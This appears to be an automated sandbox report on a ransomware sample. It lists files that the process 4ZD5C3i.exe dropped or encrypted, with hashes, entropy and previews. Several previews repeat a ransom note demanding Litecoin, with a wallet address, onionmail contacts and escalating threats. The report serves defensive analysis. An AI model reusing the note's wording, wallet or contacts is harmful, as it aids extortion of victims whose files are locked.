                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\lib\security\policy\limited\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Java\jre-1.8\lib\security\policy\unlimited\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\MSECache\OfficeKMS\catalog\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\MSECache\OfficeKMS\win7\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\MSECache\OfficeKMS\win8\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\AppXManifest.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):5036392
                                                                                                                                                                                                                                                Entropy (8bit):6.33502205419087
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:C1eS5wcaBFRR5VU/3NIptmBnvII3NIhCrM:C1j5v0TDVvcBvI/f
                                                                                                                                                                                                                                                MD5:46E420D32B6AE1F2B14D371150C75723
                                                                                                                                                                                                                                                SHA1:72A086924CA2AE64AD5E22B719B6EC642669D4EA
                                                                                                                                                                                                                                                SHA-256:0BD966B1FEDC7EE9DBFAE07F5C9FCC179A7772B96E21FCCBBEBB8399A509B791
                                                                                                                                                                                                                                                SHA-512:7D00C7079326A00F6DBD4D896A641E48A1D4EC7D9D075690683B2E493C7FFC045C73C50547936B8927DFBA9C0E56D72FEA953E9010402845C090DE838F2B9F28
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:T/\.q.`........*`.[........Ou..}.(....E]...Z..#..I)7..=..R=.R.o..Y..`Vy5w.....?o.S...S$.4.;....l..5.G...i.l#.RxD.J.e`.P./.U=P..5.FZ..N.~.s6....EJ.T.}..O3G..S.^.<...Y.g.n.h..6..h.mj..yE..[..".x./..wA.5..R......c.....Ty.=....F`....Z...s..V.."~.8..{o.w.jE(v..V..p@..4...3.uF.*.N9.......qi#.....*....m..6!..H.w.)v.]..p..L..tv-.K...\..B..f.oO.V..............m..<.3!b..3<..F....pm....O..u......dn..EC.%.l).I....R_bhU._...3z.;..|.'..(8..e.........8.l...E$...f.".....s..G.tq"^.#...!.P....T...........7......>..9.H.....m.,...s.U.....K.;.CXB...%.o..}.....0..:6fZ..."5...q..OM+!...g.&...7.e...K.....j.........hu.u..>a.n...]..z.7,..w==...r...i_...]u..........N......... .#.l.~.Daa?.....k..{..V.NF....6...[.q..WH..pD.s.4(.x!..1"(.N...4)..2/....O.3t..1.6u........+)..p+)...L7...";..U.{..\......m.D,#Ni.x7....7..M...^..+H.....t......`..q.`..~...L^6.....0.@.Q.*T.....t..d.8.A:.MY..J..bV...O^uDV...50...:...B;..g...k=y...0..7._.G../...N..~.x....uT..)..]...[.-JA.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\FileSystemMetadata.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):889
                                                                                                                                                                                                                                                Entropy (8bit):7.758746295805241
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:5vn7pmGc7n+CSjsoh2jmJrc0YXUZtwsTTGrsKn:5fMGc7n+19I4o0jZtw/
                                                                                                                                                                                                                                                MD5:FDD3CEFC3ED4AB9B5BAA4B7C9B7EA857
                                                                                                                                                                                                                                                SHA1:1E411292439EC386387C6CD862EE193D155733B5
                                                                                                                                                                                                                                                SHA-256:A119C4458E6BAAF4050F486F373F79C3E091241BA1BD7C0B2F0145C606CD5371
                                                                                                                                                                                                                                                SHA-512:E67A94506B2E7731111CCE848640D660052335C88695A0EC5E793E307CCF6BA14A76A9E4D2001872DB1C1F260E8362F2205D4D586C8ECECDBEBC2AF6D6D2C31F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:u.w7..+^.C)'...K..A.rO......G. K...]...~iw(P....C.TW`r.Q.>1..z...R.N..k.y......P.=}.s..$.....B.!v...w.e.l..b...wra.).t.....N.(...E....[W:...A0.z..H.........5).3....l."...g..)b..4q........ 5-F.v$.ud.g7.[l._zg?.!..h..4...y.$?..m4...7.L=....m..T.be.uI0....p4AHz.2......&44.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$...N'...<...~.pu.oP.n.~f...:&&..g%2R{....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\Office16\OSPP.HTM

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):175136
                                                                                                                                                                                                                                                Entropy (8bit):7.998986525082196
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:3072:o27OeadZJrP0HXs7wr+CT2LqC6v9r6jqHEK+/cqHopJvG5T+KOsYPe2EvmyHmK46:H7OTdZJrPE8ip6WkK+/Cp0T+1sUovmTQ
                                                                                                                                                                                                                                                MD5:3D5860F5406D2756C5EBCECA923B2598
                                                                                                                                                                                                                                                SHA1:2A4970B8241A853B674BC8957DB5774D23088DAA
                                                                                                                                                                                                                                                SHA-256:EBE63DD9917464E16D6F526B42779D2F6B0896F0AC9A6C1BB0F80969BE86FDC8
                                                                                                                                                                                                                                                SHA-512:27BAC35BE04E263566FC5BBBD7E3A69F0B511A96D47FBD61ADCED9A910644F494FD3763094503D4833BCF9F95A7245E1B5FDED27CEADD1A67C0B6DE318682EE2
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...89.oY7,Q<.........R..O`G,...MtO.xo[n.../............vW9....ZbY..=..>.l.|.....E..z..'.~:.%@e...-XW.mWi....|...v...p.....#6xd7x.$....)...iy...........UFC...{2.{......X........nKh.4V..B..W.Xi.C.OI5L....@.e^7.>g.........y..!.R.I8.h..|.P.....r.....Yr...f"c.%(....".a..#?-....6.%....b.R.v..Z..o3E.T..x..A..,G..Fd..U.x.z..\s......+$...%..-..=.....bQ...F>..o5.....U..L..:{X.w....R._..]..&..)W\.8.".....T...:k.k..~.:-..U.........@..J'5.....?.O~.m\.D...............~.i..<. .....8..'.._4...u.w.yy...%.!.azuB:..0..L.R..RurtM.^.....Tc{...Fpi....i.*..m/._.f.l..m....<...G.._;.+`..'aTG..Q..}...T;.....=..O...m77.#r..S".rC.d.?G.(.e.16/.E..s[@..DP..b.3...@cE.=s.....N..{...*.hY<....x..wt.?.?.....[...C$.+.,..,........".x.../.......TV"..-S._+..@..&.....p..pD.@.!S.U......W..YUVW..0+.....b.ks.&.....7..P..;..\.S>zs_...%.~..?].S.....C.s...%....2..C....S..|..1 .>.]E.rO...Y..%..CB....V...N...m..{D.f...~I*DP...4......Y..M.. _...P..Sx$Y-..".0E,....Sv.v...{..w.....P+.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):107620
                                                                                                                                                                                                                                                Entropy (8bit):7.9982611524763225
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:3072:i2HqXDfClRR7/WwOGirFp1DtKW10SczWo3cvtTA3n1lhAFl:DqWlRR7/WvxvUa0HzQSCl
                                                                                                                                                                                                                                                MD5:62E0747B7FC675658A45E32D7A703A5A
                                                                                                                                                                                                                                                SHA1:1959874142A3A9F21A21E2F517A3793F3EFFEF7E
                                                                                                                                                                                                                                                SHA-256:77D06B2E34D77293425AC34B3713E4A383DCF754C36644DF840EA14FDFB18AA8
                                                                                                                                                                                                                                                SHA-512:10EDB91B4B1D0CDE45B18146988E846D784EEC0DA5C3415F377722BE23C5A190C2839F91015840E039EA56A12CA10C4B5CD918321ABCAD927F44F9C56498913A
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:*..Q..5>.YNC...s........Yo....G..o5`..(.\Jn.Zr.-.)n.nj....j....^Q...e.4}..Xp....0.H.I...fE.'.,...sY..0...c....w.....o.^.&Y$.=T.i. ..J*...w.-.....?.,<.&..`.E..c.5...(9ja..#..p.......Q.e.....NH#..U1k.H.g.)..*4..!.<.....a...$.a..Fo.1R.E...V?u..#".1....[....+....ry/u........dJv"|.#..4....n...;......Q].g....@...E..).'./.......q3:.U....0..6.*A.dT.[.q..N...C.d)I....@..Q..w._}.6/..<.."..[..N..).m9.F`O=..X.....t..8......[....[........Ivr%Q{Z.f...3 .v./...9.o...:2].....Hr$.[z'..?.><.1.....Y.0.....f..M.|..s.b...GbR..Oz...Fd.+.o_C.|.Z..M..?....W?.ws[........>.p...}...%.h....G...A.(w|....RP...8....Y..|..-..Gq6U..^....U..&..n#...K/.....r....?.u..D.;.1s.....@~WJ+'....."I.....%%Y.L...*......^_...h9...i2.>.)..n.6q.@..K..5..Cy...G...d...Rb........~.".q....n_..+^.2.qU...#"..2..n...t.V. |..#.c....H.?u...T.G..UcU>._.....C....mZcM0...m..R.=t.}..L<................w...8,.^..^.p..........U...uU...2.K5K....Q...HkW6.i.....i<K......;gY.u`......kb-bR......M.7..S...~*A.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):162400
                                                                                                                                                                                                                                                Entropy (8bit):7.99892175784265
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:3072:Mbpu2sdrlZ/ZNm75kwtDIPjUoVDmYtlR0Mqe/M2VU0KgpuvougyXy:Mbp2lNDSkw14BVDRtlR0MnRKDwZ
                                                                                                                                                                                                                                                MD5:D0A75199869DA1F69511D948DB6BD74B
                                                                                                                                                                                                                                                SHA1:56D35DAF6F786B9302AEC723902BC499A003FA98
                                                                                                                                                                                                                                                SHA-256:66EC29C7EEED6014D611B40B85FB7AFF6CA53A82124CB2801D7040573956BD85
                                                                                                                                                                                                                                                SHA-512:AC6E70275F04A90FEE86134A398B3386CB8F42443EC49CD4DFB6E855CEF5EA05F1E6DE3E5BC7B41D9A04C976DF34F02440E63A50902869193BAB6DD1DDCD195C
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.:?P..gk.\-.=s....S.6&o.bi..|..P.1.p`{.).q.u..M.C..Q.Y3.}.....y.AN.bMs6F;.*.|.Zj+.8bz.r..W.>.am"i.d..t....k..{K...}W. ......N...9........:.......C.....DS..Gqu3;.T..sT.]..i.|.!I...&{("..C..Q..}L.y..k.....k...zB....b..K:>..B....'.....B..Zn...:?..%.v....[..5.u@._|.xt.....WU..-L..O.b.....)...K/dPr.mF.R..0.....o.X.8T.....y7gr.s5p.h.9;.......D.!.Mp...9F.\....l..|g.Z...J..k.oJ..E@Nb.G.g.....[F..r....u.....z.2...{.'?...ax.;b....).6.RE..o6v/\.[..`....].c...F..Q...!6.....&..'.'.]p.....j....R....u.Q......ba[.Yl..`......H..~.S..M'fi.|TR..6{N...K.Cw.>..~L.y8&......*..T.....sP.....w.....'4.J.m....'B......_.u.T...$..b.1(+5..s.2~.AP ...k.....n..B..[YC.=...;..'...7d....xvw....`dw.,\.Yy ..c.HG.x2.K..d.;X....D.y~..J....?.v....`.L' ...Q&b.j..?bs......"W/..%...8BA/.l^......#.....4.m.......V.k....W.M...P]..V.=..A;....} _..n8|......Z..#..2..Em..q.s..3..#.P.%.h.X].z..........#b?<s,..[.....!.p.M.rp}..4....$...8.Sf..n.by...5...a...(.TH.......tE...E..G...../S...\.5.l..~

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\Office16\SLERROR.XML

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):36944
                                                                                                                                                                                                                                                Entropy (8bit):7.994605418058789
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:768:ML+VVNnBYPDwByXIbCE9yM11q3G/UsHSojnC:rVlQw6iCEgW/UgC
                                                                                                                                                                                                                                                MD5:B83E731F460274D005AA01C18D455D5F
                                                                                                                                                                                                                                                SHA1:A2AC296B41446DDFDDCF68629BB7E97F2B2D8BFE
                                                                                                                                                                                                                                                SHA-256:0B2F9BA33D47790BA0BC25B8AD4F91FC006304A62245CA5A98FDA42159C5B1D3
                                                                                                                                                                                                                                                SHA-512:E7A788091F744772778BE22B36E3E6CDD6288B178587D7981E2F17BC4BB6A7C51CAA4DA4B852BA65029B1A3C9AFAD85D958E0CB9AA6F776C514A9F4146B6A3C3
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....Bo.M}.qo...b...zQq.s....P5...]..O....8..9...].i.[.\...:.:},.....{....t.U...`$..........Lm.g..4G...x..[.../...F.o..s6b..D2h.....]-...\e..gDw..7D..`.}.5.....l....b0X....4.F.k..^...kd!!.....t.......N...J+.B#<+L.w5...~bNOV........vj.'....D..G.,....W.R.(tv...KG..[m.WO._.!/.......v..<.D.m..t....#3 .....ok...G. ....#..7..Fuw.Ov~..,K.....[....q8..>UD..xv......~;D..l.+*K..rkMU...E.....(.W.....-.-.7r=~&....#. y<..d\e.W353.7:.A]..V.`L.m.hy..)..H}......IG.!.........9....Vj$.r.m.......b.8".0}..yA,e%...{.....r.....pun...u...1..r.=.B=:.ICE.5Z(.h=......I.....K.x..[s{.G..(.........T../*E.... mq.U..@E.\=..^.A..^.......}..e.s.=b.,......(.6JG.#N(I..d....vVi$R....^.,=.c......'.|n.%....6%)..!B.@.K.Gqp...!.....(%.*..6M.WQmyq.....V..`.c.@U.. *....oK!"O(.........-Z..5.9...Le;.`hz...J.q..,M.NP.g....|2|..?..S.Y...[...'.F)..>.......w"u..v.......G./cH...No.Xh.$..?........[..q.B.8....v......|j.\..)]4i.6s_...d.+vo,.Jr..5`f.x..7..........ZS6:........].W.

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-0015-0000-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):323201
                                                                                                                                                                                                                                                Entropy (8bit):7.999345432912856
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:6144:RfYoRVcdbEmkTygjLIeL3oiCZkZATeQgdQeakdwk4RFF2q/tKenyVR:ZYagxsnIeroZk2T9gZ7dEborzD
                                                                                                                                                                                                                                                MD5:EA9195C6414615A4F43F28AABC6BBB75
                                                                                                                                                                                                                                                SHA1:E6492FEBA2AE1E12EC708577F3760E7B488ABAE6
                                                                                                                                                                                                                                                SHA-256:09C53125442B3DBA7A5F252D8F7A8CB106E414E3DB9870B572A2B6A1297FC9F2
                                                                                                                                                                                                                                                SHA-512:4F4CED115D387EC1D77C86184AB995465163EF04A3C8D0D3835918A0544CC86B0C1C55D5C7655F241075BAD0C395FE1D3DD0D859677BFA8A7F1970B7D22F948D
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...S.XA.<!.r.....z...:{&.......1e.?....k...+C..e3.9..M."8g...u..........Hf.g..p....++.K...I.L.&..d..[.1!L..Z.fF.......qpV..u..A:.n0...`...G./.............l...+..O.s..H.....Ha.h. ....t...qB>...Z.7N.h.Pc^.(487.x..._W..m...u...`*..............K.]A..D..V=y.....I....Ne...9..{n4z!..%.M.5W.)..6......i.....y.|I.].xk.%.ET.S....L.....c^.e}..8.Ae.K.?...6..QS!.......N..A..6.;..(R^.u..c....'.gP.~q6.....:.N..X......._.....X~..Aa~).Tz...$....~O8....O...aO.h...o.......4t..).=....C.;....K...I]....2Aa.P. R..l.@:.'.8.....].R.^0.`..u..K.E....,..rMf................3..^....wEK4Y.A../.i'.6......i".6x;.!G.5....h.Y.0g...2M....f!....H...w9b.\....O......\...8!.h..I.|.~..4...t..w.Q.A....u.C...<......%i.......~..lH..._.i...$X..........:.G..9.4.C[..~.[q.v....+......d...".....C.Jy.l=...e...x.E.YT...K.%...K./~..Z..h.....O..O..J..Nk....f.l.....7.W,l..7.....>T....>C.....S...u....u1.,.ce.d&k........QX.j.%...RX.,..{r!...>..<....i...;..)`..Z..`v.......G..r.Y...*p6

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\PackageManifests\AppXManifest.90160000-0015-0409-0000-0000000FF1CE.xml

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2338
                                                                                                                                                                                                                                                Entropy (8bit):7.915379154906691
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:NkIHIDCpcPFv/ubz8JfWACx1MnxyR314/154o0jZtwqBc:NEDCpUEzWWAo2kE16leb
                                                                                                                                                                                                                                                MD5:B5A10096F088DD8E74CDF3D09F674498
                                                                                                                                                                                                                                                SHA1:AE438405A4F1FE4702D524C0664D9950B992FA5E
                                                                                                                                                                                                                                                SHA-256:EE84366CEC34A1AF3AD6CAD189D7D027981858BF20226E4F730305CBE8A69C5B
                                                                                                                                                                                                                                                SHA-512:F0BBC7BBD01CF34227EE8FD670A146661A147F3C7E5F4F0A05921D79DCF7809827451F19853B42AD2F15724D435FB583A2ADEC71229C3417BD120B256DAA7D87
                                                                                                                                                                                                                                                Malicious:false
